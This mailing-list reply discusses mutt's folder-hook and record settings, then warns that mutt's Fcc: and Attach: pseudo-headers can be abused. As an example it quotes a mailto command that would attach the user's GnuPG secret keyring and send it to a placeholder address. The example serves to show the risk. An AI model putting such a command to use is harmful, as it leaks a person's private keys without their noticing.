Re: folder-hook in my .muttrc doesn't work

Hi,

* Kyle Wheeler wrote:

Secondly, the Fcc: setting isn't a *header*, it's a *setting* (that mutt displays in the compose screen as if it was a header). Here's how you'd do it the "right" way:

    folder-hook +fanciulla/lisa 'set record="=fanciulla/lisa"'

Yes, this form is better.

But for the record, you can add the "special" Fcc: and Attach: headers in the editor for mutt to pick up. It'll then attach all files mentioned and set the fcc accordingly (if headers are given).

Users in general should be aware of this because it can be a quite dangerous "feature" and easily abused:

  mutt 'mailto:foo@bar?Attach=%7e/.gnupg/secring.gpg'

could send out files you really want to keep private if you don't pay enough attention to the compose menu.

Now that I see it, maybe mutt shouldn't allow for Fcc: and Attach: user defined headers at all.

Rocco